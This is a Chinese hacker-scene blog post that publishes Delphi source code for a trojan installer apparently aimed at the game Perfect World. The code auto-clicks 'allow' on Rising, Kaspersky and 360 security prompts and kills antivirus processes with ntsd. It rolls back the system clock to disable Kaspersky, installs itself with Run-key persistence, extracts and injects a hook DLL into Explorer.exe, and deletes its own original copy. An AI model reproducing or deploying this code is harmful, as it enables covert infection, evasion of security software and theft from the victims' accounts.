-
公告
- 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
-
写作时间
-
原创下载
-
最新文章
- [04/29]大半个月的上班族
- [04/29]Google 黑客搜索技巧
- [04/23]绕过主动防御 木马病毒刺穿卡巴斯基
- [04/16]老牌社区K666再度易主 续谈当年情
- [04/14]第一天上班。
- [04/14]华夏[破还原-穿主动]完美下载者
- [04/10]第一次应凭。
- [04/08]百度K后重收经验!
- [04/06]Themida & WinLicen V1.9.1.0--V1.9.5.0 系列脱壳脚本.By.fxyang[CUG]
- [04/05]拿站之---郁闷!
- [04/02]新站建立难!
- [03/31]嘿嘿,小说站有进步!
- [03/28]五天来的琐碎片段。
- [03/23]完美世界EXE包含部分代码
- [03/22]完美世界截取和发信部分代码
-
最新评论
-
文章归档
-
Statistics
- 文章总数:154
- 评论总数:47
- 引用总数:0
- 浏览总数:121178
- 留言总数:0
- 当前样式:4u-HK
- 当前语言:zh-CN
-
友情链接
- 反木马在线
- 热门小说网
- 老喜 'S Blog
- 示波器
- 中国电脑论坛
- 交换友情链接请与QQ:287963907联系.审核非违法网站都可通过!
-
反向链接
完美世界EXE包含部分代码
program nwizgj;
{$I Define.Inc}
{$R hook.res}
uses
Windows,
Messages,//tlhelp32,
FunUnit,
VarUnit in '..\Hook\VarUnit.pas',
myfunc in 'myfunc.pas';
//{$DEFINE Test}
const
CSTR_REGEdit = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
var flag_end:boolean;
// 关闭卡巴斯基与瑞星注册表检测功能
procedure CloseKaoBa;
var f1,f2:integer;
r1:trect;
s:string;
const WM_LBUTTONDOWN = $0201;
WM_LBUTTONUP = $0202;
WM_CLOSE = $0010;
begin
//d:=GetTickCount()+20*1000;
while true do
begin
if flag_end=true then break;
try
//瑞星
s:='瑞星注册表监控提示';
f1:=findwindow('#32770',pchar(s));
if f1<>0 then
begin
SetForegroundWindow(f1);
SetActiveWindow(f1);
f2:=FindWindowEx(f1,0,'Button','同意修改');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
//showmessage('a');
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
f2:=FindWindowEx(f1,0,'Button','确定');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
end;
//瑞星
f1:=findwindow('#32770','IE 执行保护');
if f1=0 then
f1:=findwindow('#32770','IE执行保护');
if f1<>0 then
begin
SetForegroundWindow(f1);
SetActiveWindow(f1);
f2:=FindWindowEx(f1,0,'Button','允许执行');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
//showmessage('a');
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
f2:=FindWindowEx(f1,0,'Button','确定');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
end;
//瑞星卡卡
s:='瑞';
s:=s+'星';
s:=s+'卡卡上网安全助手 - IE防漏墙';
f1:=findwindow(pchar('#32770'),pchar(s));
if f1<>0 then
begin
f2:=FindWindowEx(f1,0,'Button','允许');
if f2<>0 then
begin
getwindowrect(f2,r1);
setcursorpos(r1.Left+(r1.Right-r1.Left) div 2,r1.Top+(r1.Bottom-r1.Top) div 2);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
end;
//卡吧
f1:=findwindow('AVP.AlertDialog',nil);//得到瑞星窗体
if f1<>0 then
begin
f2:=FindWindowEx(f1,0,'AVP.Button','创建规则');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
f2:=FindWindowEx(f1,0,'AVP.Button','允许');
if f2=0 then
f2:=FindWindowEx(f1,0,'AVP.Button','允许(&A)');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
else
begin
f2:=FindWindowEx(f1,0,'AVP.Button','跳过');
if f2=0 then
f2:=FindWindowEx(f1,0,'AVP.Button','跳过(&S)');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
else
SendMessage(f1, WM_close, 0, 0);
end;
end;
s:='AVP.Pr';
s:=s+'oduct_Notification';
f1:=findwindow(pchar(s),nil);
if f1<>0 then
SendMessage(f1, WM_close, 0, 0);
f1:=findwindow('AVP.TrafficMonConnectionTerm',nil);
if f1<>0 then
begin
f2:=FindWindowEx(f1,0,'AVP.Button','否');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end
else
SendMessage(f1, WM_close, 0, 0);
end;
//360safe
f1:=findwindow('Afx:400000:0','');
if f1<>0 then
begin
f2:=FindWindowEx(f1,0,'Button','允许此动作');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
f2:=FindWindowEx(f1,0,'Button','确定');
if f2<>0 then
begin
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
SendMessage(f2, WM_LBUTTONDOWN, 0, 0);
SendMessage(f2, WM_LBUTTONUP, 0, 0);
end;
end;
end;
except
end;
//if GetTickCount()>d then break;
sleep(5);
end;
end;
function EnabledDebugPrivilege(const Enabled : Boolean) : Boolean;
var
hTk : THandle;
rtnTemp : Dword;
TokenPri : TOKEN_PRIVILEGES;
const
SE_DEBUG = 'SeDebugPrivilege';
begin
Result := False;
try
if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,hTk)) then
begin
TokenPri.PrivilegeCount := 1;
LookupPrivilegeValue(nil,SE_DEBUG,TokenPri.Privileges[0].Luid);
if Enabled then
TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
TokenPri.Privileges[0].Attributes := 0;
rtnTemp := 0;
AdjustTokenPrivileges(hTk,False,TokenPri,sizeof(TokenPri),nil,rtnTemp);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hTk);
end;
except
end;
end;
//插入进程
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters:pointer;
thh,m1,p1,s1:cardinal;
Write_Process_Memory:function(hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL;
hdll:integer;
WriteProcessMemorys:string;
begin
Result := False;
try
m1:=MEM_COMMIT;
p1:=PAGE_READWRITE;
s1:=4096;
Parameters := xVirtual_AllocEx(Process, nil, s1, m1, p1);
if Parameters = nil then Exit;
sleep(1);
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), s1, BytesWritten);
Thread := xCreate_RemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
WaitForSingleObject(Thread, INFINITE);
xVirtual_FreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
except
end;
end;
function ExtractRes(ResType, ResName, OutName: string): Boolean;
var
HResInfo: THandle;
HGlobal: THandle;
HFile: THandle;
Ptr: Pointer;
Size, N: Integer;
begin
Result := False;
try
HFile := INVALID_HANDLE_VALUE;
repeat
HResInfo := FindResource(HInstance, PChar(ResName), PChar(ResType));
if HResInfo = 0 then Break;
HGlobal := LoadResource(HInstance, HResInfo);
if HGlobal = 0 then Break;
Ptr := LockResource(HGlobal);
Size := SizeOfResource(HInstance, HResInfo);
if Ptr = nil then Break;
HFile := CreateFile(PChar(OutName), GENERIC_READ or GENERIC_WRITE,
0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if HFile = INVALID_HANDLE_VALUE then Break;
if WriteFile(HFile, Ptr^, Size, LongWord(N), nil) then Result := True;
until True;
if HFile <> INVALID_HANDLE_VALUE then CloseHandle(HFile);
SetFileAttributes(PChar(OutName), 0);
except
end;
end;
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
procedure ExtDelMe(fn:string);
var
F: textfile;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
const BatchFileName='c:\mynw.bat';
begin
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + fn + '"');
WriteLn(F, 'if exist "' + fn + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
sleep(1000);
winexec(pchar(BatchFileName),sw_hide);
end;
function LowerCase(const S: string): string;
var
Ch: Char;
L: Integer;
Source, Dest: PChar;
begin
L := Length(S);
SetLength(Result, L);
Source := Pointer(S);
Dest := Pointer(Result);
while L <> 0 do
begin
Ch := Source^;
if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
Dest^ := Ch;
Inc(Source);
Inc(Dest);
Dec(L);
end;
end;
function ExtractFileName(const FileName: string): string;
var
I: Integer;
begin
result:=FileName;
while true do
begin
i:=pos('\',result);
if i<=0 then exit;
result:=copy(result,i+1,length(result));
end;
end;
function AnsiCompareText(const S1, S2: string): Integer;
begin
Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1),
Length(S1), PChar(S2), Length(S2)) - 2;
end;
procedure CvtInt;
{ IN:
EAX: The integer value to be converted to text
ESI: Ptr to the right-hand side of the output buffer: LEA ESI, StrBuf[16]
ECX: Base for conversion: 0 for signed decimal, 10 or 16 for unsigned
EDX: Precision: zero padded minimum field width
OUT:
ESI: Ptr to start of converted text (not start of buffer)
ECX: Length of converted text
}
asm
OR CL,CL
JNZ @CvtLoop
@C1: OR EAX,EAX
JNS @C2
NEG EAX
CALL @C2
MOV AL,'-'
INC ECX
DEC ESI
MOV [ESI],AL
RET
@C2: MOV ECX,10
@CvtLoop:
PUSH EDX
PUSH ESI
@D1: XOR EDX,EDX
DIV ECX
DEC ESI
ADD DL,'0'
CMP DL,'0'+10
JB @D2
ADD DL,('A'-'0')-10
@D2: MOV [ESI],DL
OR EAX,EAX
JNE @D1
POP ECX
POP EDX
SUB ECX,ESI
SUB EDX,ECX
JBE @D5
ADD ECX,EDX
MOV AL,'0'
SUB ESI,EDX
JMP @z
@zloop: MOV [ESI+EDX],AL
@z: DEC EDX
JNZ @zloop
MOV [ESI],AL
@D5:
end;
function IntToStr(Value: Integer): string;
// FmtStr(Result, '%d', [Value]);
asm
PUSH ESI
MOV ESI, ESP
SUB ESP, 16
XOR ECX, ECX // base: 0 for signed decimal
PUSH EDX // result ptr
XOR EDX, EDX // zero filled field width: 0 for no leading zeros
CALL CvtInt
MOV EDX, ESI
POP EAX // result ptr
CALL System.@LStrFromPCharLen
ADD ESP, 16
POP ESI
end;
type
tagPROCESSENTRY32 = packed record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD; // this process
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD; // associated exe
cntThreads: DWORD;
th32ParentProcessID: DWORD; // this process's parent process
pcPriClassBase: Longint; // Base priority of process's threads
dwFlags: DWORD;
szExeFile: array[0..MAX_PATH - 1] of Char;// Path
end;
TProcessEntry32 = tagPROCESSENTRY32;
const
TH32CS_SNAPHEAPLIST = $00000001;
TH32CS_SNAPPROCESS = $00000002;
TH32CS_SNAPTHREAD = $00000004;
TH32CS_SNAPMODULE = $00000008;
TH32CS_SNAPALL = TH32CS_SNAPHEAPLIST or TH32CS_SNAPPROCESS or TH32CS_SNAPTHREAD or TH32CS_SNAPMODULE;
function CreateToolhelp32Snapshot(dwFlags, th32ProcessID: DWORD): THandle;stdcall;external kernel32 name 'CreateToolhelp32Snapshot';
function Process32First(hSnapshot: THandle; var lppe: TProcessEntry32): BOOL;stdcall;external kernel32 name 'Process32First';
function Process32Next(hSnapshot: THandle; var lppe: TProcessEntry32): BOOL;stdcall;external kernel32 name 'Process32Next';
function HasKV:boolean;
const maxp=6;
var
lppe: tprocessentry32;
sshandle: thandle;
found: boolean;
pg:array[1..maxp] of string;
pgh:array[1..maxp] of integer;
i:integer;
begin
result:=false;
for i:=1 to maxp do
begin
pg[i]:='';
pgh[i]:=0;
end;
pg[1]:='RUNIEP.EXE';//瑞星kaka
pg[2]:='KRegEx.exe';
pg[3]:='KVXP.kxp';
//pg[4]:='KVMonXP.kxp';
//pg[5]:='trojdie.kxp';
//pg[6]:='uihost.exe';
sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
found := process32first(sshandle, lppe);
while found do
begin
for i:=1 to maxp do
if pg[i]<>'' then
if AnsiCompareText(lowercase(ExtractFileName(lppe.szExefile)),lowercase(pg[i])) = 0 then
begin
//result:=true;
//break;
pgh[i]:=lppe.th32ProcessID;
end;
//if result then break;
found := process32next(sshandle, lppe);
sleep(1);
end;
CloseHandle(sshandle);
for i:=1 to maxp do
if pgh[i]<>0 then
begin
winexec(pchar('ntsd -c q -p '+inttostr(pgh[i])),SW_MINIMIZE);
end;
end;
function HasKaba:boolean;
const maxp=6;
var
lppe: tprocessentry32;
sshandle: thandle;
found: boolean;
pg:array[1..maxp] of string;
pgh:array[1..maxp] of integer;
i:integer;
begin
result:=false;
for i:=1 to maxp do
begin
pg[i]:='';
pgh[i]:=0;
end;
pg[2]:='avp';
pg[2]:=pg[2]+'.exe';
sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
found := process32first(sshandle, lppe);
while found do
begin
for i:=1 to maxp do
if pg[i]<>'' then
if ansiCompareText(lowercase(ExtractFileName(lppe.szExefile)),lowercase(pg[i])) = 0 then
begin
result:=true;
break;
pgh[i]:=lppe.th32ProcessID;
end;
if result then break;
found := process32next(sshandle, lppe);
sleep(1);
end;
CloseHandle(sshandle);
end;
// 枚举进程名
function GetProcessID(ProcessName : String): DWORD;
var
Process32: TProcessEntry32;
ProcessSnapshot: THandle;
begin
Result := 0;
ProcessSnapshot := CreateToolHelp32SnapShot(TH32CS_SNAPALL, 0);
Process32.dwSize := SizeOf(TProcessEntry32);
Process32First(ProcessSnapshot, Process32);
repeat
if CompareAnsiText(ProcessName, Process32.szExeFile) then Result := Process32.th32ProcessID;
until not (Process32Next(ProcessSnapshot, Process32));
CloseHandle(ProcessSnapshot);
end;
type
PDayTable = ^TDayTable;
TDayTable = array[1..12] of Word;
TTimeStamp = record
Time: Integer; { Number of milliseconds since midnight }
Date: Integer; { One plus number of days since 1/1/0001 }
end;
const
HoursPerDay = 24;
MinsPerHour = 60;
SecsPerMin = 60;
MSecsPerSec = 1000;
MinsPerDay = HoursPerDay * MinsPerHour;
SecsPerDay = MinsPerDay * SecsPerMin;
MSecsPerDay = SecsPerDay * MSecsPerSec;
FMSecsPerDay: Single = MSecsPerDay;
IMSecsPerDay: Integer = MSecsPerDay;
DateDelta = 693594;
MonthDays: array [Boolean] of TDayTable =
((31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31),
(31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31));
function DateTimeToTimeStamp(DateTime: TDateTime): TTimeStamp;
asm
PUSH EBX
{$IFDEF PIC}
PUSH EAX
CALL GetGOT
MOV EBX,EAX
POP EAX
{$ELSE}
XOR EBX,EBX
{$ENDIF}
MOV ECX,EAX
FLD DateTime
FMUL [EBX].FMSecsPerDay
SUB ESP,8
FISTP QWORD PTR [ESP]
FWAIT
POP EAX
POP EDX
OR EDX,EDX
JNS @@1
NEG EDX
NEG EAX
SBB EDX,0
DIV [EBX].IMSecsPerDay
NEG EAX
JMP @@2
@@1: DIV [EBX].IMSecsPerDay
@@2: ADD EAX,DateDelta
MOV [ECX].TTimeStamp.Time,EDX
MOV [ECX].TTimeStamp.Date,EAX
POP EBX
end;
procedure DivMod(Dividend: Integer; Divisor: Word;
var Result, Remainder: Word);
asm
PUSH EBX
MOV EBX,EDX
MOV EDX,EAX
SHR EDX,16
DIV BX
MOV EBX,Remainder
MOV [ECX],AX
MOV [EBX],DX
POP EBX
end;
function IsLeapYear(Year: Word): Boolean;
begin
Result := (Year mod 4 = 0) and ((Year mod 100 <> 0) or (Year mod 400 = 0));
end;
function DecodeDateFully(const DateTime: TDateTime; var Year, Month, Day, DOW: Word): Boolean;
const
D1 = 365;
D4 = D1 * 4 + 1;
D100 = D4 * 25 - 1;
D400 = D100 * 4 + 1;
var
Y, M, D, I: Word;
T: Integer;
DayTable: PDayTable;
begin
T := DateTimeToTimeStamp(DateTime).Date;
if T <= 0 then
begin
Year := 0;
Month := 0;
Day := 0;
DOW := 0;
Result := False;
end else
begin
DOW := T mod 7 + 1;
Dec(T);
Y := 1;
while T >= D400 do
begin
Dec(T, D400);
Inc(Y, 400);
end;
DivMod(T, D100, I, D);
if I = 4 then
begin
Dec(I);
Inc(D, D100);
end;
Inc(Y, I * 100);
DivMod(D, D4, I, D);
Inc(Y, I * 4);
DivMod(D, D1, I, D);
if I = 4 then
begin
Dec(I);
Inc(D, D1);
end;
Inc(Y, I);
Result := IsLeapYear(Y);
DayTable := @MonthDays[Result];
M := 1;
while True do
begin
I := DayTable^[M];
if D < I then Break;
Dec(D, I);
Inc(M);
end;
Year := Y;
Month := M;
Day := D + 1;
end;
end;
procedure DecodeDate(const DateTime: TDateTime; var Year, Month, Day: Word);
var
Dummy: Word;
begin
DecodeDateFully(DateTime, Year, Month, Day, Dummy);
end;
procedure DecodeTime(const DateTime: TDateTime; var Hour, Min, Sec, MSec: Word);
var
MinCount, MSecCount: Word;
begin
DivMod(DateTimeToTimeStamp(DateTime).Time, SecsPerMin * MSecsPerSec, MinCount, MSecCount);
DivMod(MinCount, MinsPerHour, Hour, Min);
DivMod(MSecCount, MSecsPerSec, Sec, MSec);
end;
procedure DecodeDateTime(const AValue: TDateTime; out AYear, AMonth, ADay,
AHour, AMinute, ASecond, AMilliSecond: Word);
begin
DecodeDate(AValue, AYear, AMonth, ADay);
DecodeTime(AValue, AHour, AMinute, ASecond, AMilliSecond);
end;
procedure DateTimeToSystemTime(const DateTime: TDateTime; var SystemTime: TSystemTime);
begin
with SystemTime do
begin
DecodeDateFully(DateTime, wYear, wMonth, wDay, wDayOfWeek);
Dec(wDayOfWeek);
DecodeTime(DateTime, wHour, wMinute, wSecond, wMilliseconds);
end;
end;
function TryEncodeDate(Year, Month, Day: Word; out Date: TDateTime): Boolean;
var
I: Integer;
DayTable: PDayTable;
begin
Result := False;
DayTable := @MonthDays[IsLeapYear(Year)];
if (Year >= 1) and (Year <= 9999) and (Month >= 1) and (Month <= 12) and
(Day >= 1) and (Day <= DayTable^[Month]) then
begin
for I := 1 to Month - 1 do Inc(Day, DayTable^[I]);
I := Year - 1;
Date := I * 365 + I div 4 - I div 100 + I div 400 + Day - DateDelta;
Result := True;
end;
end;
function EncodeDate(Year, Month, Day: Word): TDateTime;
begin
TryEncodeDate(Year, Month, Day, Result);
end;
function TryEncodeTime(Hour, Min, Sec, MSec: Word; out Time: TDateTime): Boolean;
begin
Result := False;
if (Hour < HoursPerDay) and (Min < MinsPerHour) and (Sec < SecsPerMin) and (MSec < MSecsPerSec) then
begin
Time := (Hour * (MinsPerHour * SecsPerMin * MSecsPerSec) +
Min * (SecsPerMin * MSecsPerSec) +
Sec * MSecsPerSec +
MSec) / MSecsPerDay;
Result := True;
end;
end;
function EncodeTime(Hour, Min, Sec, MSec: Word): TDateTime;
begin
TryEncodeTime(Hour, Min, Sec, MSec, Result);
end;
function Now: TDateTime;
var
SystemTime: TSystemTime;
begin
GetLocalTime(SystemTime);
with SystemTime do
Result := EncodeDate(wYear, wMonth, wDay) +
EncodeTime(wHour, wMinute, wSecond, wMilliseconds);
end;
function TryEncodeDateTime(const AYear, AMonth, ADay, AHour, AMinute, ASecond,
AMilliSecond: Word; out AValue: TDateTime): Boolean;
var
LTime: TDateTime;
begin
Result := TryEncodeDate(AYear, AMonth, ADay, AValue);
if Result then
begin
Result := TryEncodeTime(AHour, AMinute, ASecond, AMilliSecond, LTime);
if Result then
AValue := AValue + LTime;
end;
end;
function EncodeDateTime(const AYear, AMonth, ADay, AHour, AMinute, ASecond,
AMilliSecond: Word): TDateTime;
begin
TryEncodeDateTime(AYear, AMonth, ADay,
AHour, AMinute, ASecond, AMilliSecond, Result);
end;
procedure SetTime(y,m,d,h,min,se,ms:word);
var rq:tdatetime;
SysTime: TSystemTime;
begin
rq:=EncodeDateTime(y,m,d,h,min,se,ms);
DateTimeToSystemTime(rq,SysTime);
//SetSystemTime(SysTime) ;
setlocaltime(SysTime);
end;
var
Msg: TMsg;
szBuffer: Array[0..MAX_PATH] of Char;
StrSelfModule, StrInstallPath, StrHookModule,tmp: string;
HookOn, HookOff: procedure;
hModule,Process: THandle;
thh:cardinal;
kb:boolean;
y,m,d,h,min,se,ms,y_tmp:word;
begin
Wait(1000);
if Find_Window(EXE_WindowClass, EXE_WindowTitle) then
begin
{$IFDEF Test}
OutputDebugText('寻找到EXE互斥窗口退出!');
{$ENDIF}
Exit;
end;
ZeroMemory(@szBuffer, MAX_PATH);
GetModuleFileName(0, szBuffer, MAX_PATH);
StrSelfModule := PChar(@szBuffer);
StrInstallPath := GetSystemDir(1) + 'nwizgj.exe';
{$IFDEF Test}
OutputDebugText('自身路径: ' + StrSelfModule);
OutputDebugText('安装路径: ' + StrInstallPath);
{$ENDIF}
// 开启关闭卡巴斯基窗口功能
//CreateThread(nil, 1024, @ThreadFuncProc, nil, 0, nil);
EnabledDebugPrivilege(true);
kb:=HasKaba;
flag_end:=false;
CreateThread(nil, 0, @CloseKaoBa, nil, 0, thh);
if kb then
try
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y_tmp:=y;
y:=1987;
SetTime(y,m,d,h,min,se,ms);
sleep(10*1000);
except
end;
HasKV;
try
if CompareAnsiText(StrInstallPath, StrSelfModule)=false then
begin
DeleteFile(PChar(StrInstallPath));
CopyFile(PChar(StrSelfModule), PChar(StrInstallPath), False);
WinExec(PChar(StrInstallPath), SW_SHOW);
ExtDelMe(paramstr(0));
exit;
end;
Wait(1000);
SetStrValue(HKEY_LOCAL_MACHINE, CSTR_REGEdit, 'nwizgj', PChar(StrSelfModule));
StrHookModule := GetSystemDir(1)+'nwizgj.dll';
{$IFDEF Test}
OutputDebugText('Hook模块保存路径: ' + StrHookModule);
{$ENDIF}
if fileexists(StrHookModule) then
begin
deletefile(pchar(StrHookModule));
sleep(1000);
if fileexists(StrHookModule) then exit;
end;
if Not ExtractRes('hook','dll',StrHookModule) then
begin
{$IFDEF Test}
OutputDebugText('保存Hook模块失败!退出程序!');
{$ENDIF}
Exit;
end{$IFDEF Test}else OutputDebugText('保存Hook模块成功!'){$ENDIF};
if Create_Window(EXE_WindowClass, EXE_WindowTitle) then
begin
{$IFDEF Test}
OutputDebugText('开始进行DLL进程插入!');
{$ENDIF}
EnabledDebugPrivilege(true);
hModule:=GetProcessID('Explorer.exe');
if hModule>0 then
begin
Process := OpenProcess(PROCESS_ALL_ACCESS, False, hModule);
if Process>0 then
begin
try
EnabledDebugPrivilege(true);
haskv;
sleep(2000);
except
end;
if InjectLibrary(Process,pchar(StrHookModule)) then
begin
{$IFDEF Test}
OutputDebugText('DLL进程插入成功!');
{$ENDIF}
end
else
begin
{$IFDEF Test}
OutputDebugText('DLL进程插入失败!');
{$ENDIF}
end;
end;
end;
end{$IFDEF Test}else OutputDebugText('窗口创建失败!'){$ENDIF};
finally
flag_end:=true;
sleep(1000);
if kb then
try
DecodeDateTime(now,Y, M, d,h,min,se,ms);
y:=y_tmp;
if y<2007 then y:=2007;
SetTime(y,m,d,h,min,se,ms);
except
end;
ExitProcess(0);
end;
exit;
end.
2 Comments , 0 Trackbacks
Jump to comment form | comments rss | Get trackback uri